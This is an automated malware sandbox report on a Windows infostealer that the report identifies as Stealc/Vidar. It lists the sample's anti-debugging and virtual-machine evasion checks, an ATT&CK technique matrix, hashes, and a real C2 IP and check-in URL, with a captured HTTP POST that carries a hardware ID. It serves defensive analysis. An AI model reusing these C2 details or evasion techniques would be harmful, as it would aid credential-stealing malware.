Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00744570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, | 0_2_00744570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0073ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, | 0_2_0073ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0073BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, | 0_2_0073BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0073DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_0073DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_007316D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0073F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_0073F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00743EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, | 0_2_00743EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0073F68A FindFirstFileA, | 0_2_0073F68A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00731160 GetSystemInfo,ExitProcess, | 0_2_00731160
Source: file.exe, file.exe, 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2170845587.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2170845587.0000000001440000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2170845587.00000000013CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13417
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13420
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13439
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13471
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13431
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007345C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_007345C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_00749860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749750 mov eax, dword ptr fs:[00000030h] | 0_2_00749750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00747850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, | 0_2_00747850
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 5588, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, | 0_2_00749600
Source: file.exe, file.exe, 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, | 0_2_00747B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00746920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, | 0_2_00746920
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00747850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, | 0_2_00747850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00747A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, | 0_2_00747A30

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2170845587.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2036482176.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5588, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2170845587.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2036482176.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5588, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the count of matched signatures for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
http://185.215.113.37/ws | 100% | URL Reputation | malware
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.phphS) | file.exe, 00000000.00000002.2170845587.0000000001440000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.2170845587.00000000013CE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.2170845587.0000000001426000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpi | file.exe, 00000000.00000002.2170845587.0000000001426000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1532981
Start date and time: 2024-10-14 08:57:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 79%
• Number of executed functions: 18
• Number of non-executed functions: 85
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
                    No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.215.113.37 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
No context
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.945341996240295
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'856'512 bytes
MD5: 9fa6a87d6ac6c29173f38b8de4ea7272
SHA1: c333a6778cc153fdbbadccc1cda4f575103c818c
SHA256: 56b3a862526d4a5ae4311c3b742a7a42cd6206939944458e3566694b1cddf0ba
SHA512: 913efb4c7ece09f91af9fc7f0309b95136144706636880993720ebde7fc0a28fc09b26ba72c2c26513fe238fad72a7d49c46e37ec2c6a83055968ae900fb021c
SSDEEP: 49152:R3frr12zC+DmeyrY2D7m8kVpvDSJW9UqAFsv:xp2Bmr9Di8kVpDcW9Uqjv
TLSH: 1385333B1FB7B7CCC5CE8930556E116BD84AEA2AC4161DFAB98183F0D772829670CD91
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 00928e8e8686b000
Entrypoint: 0xa9b000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Programming Language:
• [C++] VS2010 build 30319
• [ASM] VS2010 build 30319
• [ C ] VS2010 build 30319
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | cc54a1d82142359d175c5e3d32842250 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x29d000 | 0x200 | 873deeb3f5d3e810fc813775a0b75a71 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lyglkzel | 0x4fb000 | 0x19f000 | 0x19f000 | 0382e73feca9d9c9316df90d61e63bae | False | 0.9946942065135542 | data | 7.95357659859666 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
njsekajy | 0x69a000 | 0x1000 | 0x600 | 67ac0235ad982360af0a1fa4f138f78c | False | 0.5240885416666666 | data | 4.741618845278596 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x69b000 | 0x3000 | 0x2200 | 3ef9c6bfb8ee64973671e69728a35962 | False | 0.058363970588235295 | DOS executable (COM) | 0.6349130055277218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-14T08:58:08.073470+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 14, 2024 08:57:56.786123037 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 14, 2024 08:57:56.791255951 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 14, 2024 08:57:56.791357994 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 14, 2024 08:57:56.791490078 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 14, 2024 08:57:56.796588898 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 14, 2024 08:58:07.818948984 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 14, 2024 08:58:07.819070101 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 14, 2024 08:58:07.833405018 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 14, 2024 08:58:07.838265896 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 14, 2024 08:58:08.073322058 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 14, 2024 08:58:08.073470116 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 14, 2024 08:58:11.496536016 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
• 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | 5588 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 14, 2024 08:57:56.791490078 CEST | 89 | OUT | GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Oct 14, 2024 08:58:07.818948984 CEST | 203 | IN | HTTP/1.1 200 OK
Date: Mon, 14 Oct 2024 06:58:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 14, 2024 08:58:07.833405018 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFI
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 33 44 46 45 45 30 31 45 34 46 34 30 33 33 30 36 30 30 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a
Data Ascii (line breaks restored from the CRLF bytes in Data Raw):
------JKKFIIEBKEGIEBFIJKFI
Content-Disposition: form-data; name="hwid"

2C3DFEE01E4F4033060071
------JKKFIIEBKEGIEBFIJKFI
Content-Disposition: form-data; name="build"

doma
------JKKFIIEBKEGIEBFIJKFI--
Oct 14, 2024 08:58:08.073322058 CEST | 210 | IN | HTTP/1.1 200 OK
Date: Mon, 14 Oct 2024 06:58:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=

Target ID: 0
Start time: 02:57:54
Start date: 14/10/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x730000
File size: 1'856'512 bytes
MD5 hash: 9FA6A87D6AC6C29173F38B8DE4EA7272
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2170845587.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2036482176.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Execution Graph

Execution Coverage: 7.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.9%
Total number of Nodes: 2000
Total number of Limit Nodes: 25
API calls 14027->14028 14029 7335d7 14028->14029 14030 7345c0 2 API calls 14029->14030 14031 7335f0 14030->14031 14032 7345c0 2 API calls 14031->14032 14033 733609 14032->14033 14034 7345c0 2 API calls 14033->14034 14035 733622 14034->14035 14036 7345c0 2 API calls 14035->14036 14037 73363b 14036->14037 14038 7345c0 2 API calls 14037->14038 14039 733654 14038->14039 14040 7345c0 2 API calls 14039->14040 14041 73366d 14040->14041 14042 7345c0 2 API calls 14041->14042 14043 733686 14042->14043 14044 7345c0 2 API calls 14043->14044 14045 73369f 14044->14045 14046 7345c0 2 API calls 14045->14046 14047 7336b8 14046->14047 14048 7345c0 2 API calls 14047->14048 14049 7336d1 14048->14049 14050 7345c0 2 API calls 14049->14050 14051 7336ea 14050->14051 14052 7345c0 2 API calls 14051->14052 14053 733703 14052->14053 14054 7345c0 2 API calls 14053->14054 14055 73371c 14054->14055 14056 7345c0 2 API calls 14055->14056 14057 733735 14056->14057 14058 7345c0 2 API calls 14057->14058 14059 73374e 14058->14059 14060 7345c0 2 API calls 14059->14060 14061 733767 14060->14061 14062 7345c0 2 API calls 14061->14062 14063 733780 14062->14063 14064 7345c0 2 API calls 14063->14064 14065 733799 14064->14065 14066 7345c0 2 API calls 14065->14066 14067 7337b2 14066->14067 14068 7345c0 2 API calls 14067->14068 14069 7337cb 14068->14069 14070 7345c0 2 API calls 14069->14070 14071 7337e4 14070->14071 14072 7345c0 2 API calls 14071->14072 14073 7337fd 14072->14073 14074 7345c0 2 API calls 14073->14074 14075 733816 14074->14075 14076 7345c0 2 API calls 14075->14076 14077 73382f 14076->14077 14078 7345c0 2 API calls 14077->14078 14079 733848 14078->14079 14080 7345c0 2 API calls 14079->14080 14081 733861 14080->14081 14082 7345c0 2 API calls 14081->14082 14083 73387a 14082->14083 14084 7345c0 2 API calls 14083->14084 14085 733893 14084->14085 14086 7345c0 2 API calls 14085->14086 14087 7338ac 14086->14087 14088 7345c0 2 API calls 14087->14088 14089 7338c5 14088->14089 14090 7345c0 2 API calls 
14089->14090 14091 7338de 14090->14091 14092 7345c0 2 API calls 14091->14092 14093 7338f7 14092->14093 14094 7345c0 2 API calls 14093->14094 14095 733910 14094->14095 14096 7345c0 2 API calls 14095->14096 14097 733929 14096->14097 14098 7345c0 2 API calls 14097->14098 14099 733942 14098->14099 14100 7345c0 2 API calls 14099->14100 14101 73395b 14100->14101 14102 7345c0 2 API calls 14101->14102 14103 733974 14102->14103 14104 7345c0 2 API calls 14103->14104 14105 73398d 14104->14105 14106 7345c0 2 API calls 14105->14106 14107 7339a6 14106->14107 14108 7345c0 2 API calls 14107->14108 14109 7339bf 14108->14109 14110 7345c0 2 API calls 14109->14110 14111 7339d8 14110->14111 14112 7345c0 2 API calls 14111->14112 14113 7339f1 14112->14113 14114 7345c0 2 API calls 14113->14114 14115 733a0a 14114->14115 14116 7345c0 2 API calls 14115->14116 14117 733a23 14116->14117 14118 7345c0 2 API calls 14117->14118 14119 733a3c 14118->14119 14120 7345c0 2 API calls 14119->14120 14121 733a55 14120->14121 14122 7345c0 2 API calls 14121->14122 14123 733a6e 14122->14123 14124 7345c0 2 API calls 14123->14124 14125 733a87 14124->14125 14126 7345c0 2 API calls 14125->14126 14127 733aa0 14126->14127 14128 7345c0 2 API calls 14127->14128 14129 733ab9 14128->14129 14130 7345c0 2 API calls 14129->14130 14131 733ad2 14130->14131 14132 7345c0 2 API calls 14131->14132 14133 733aeb 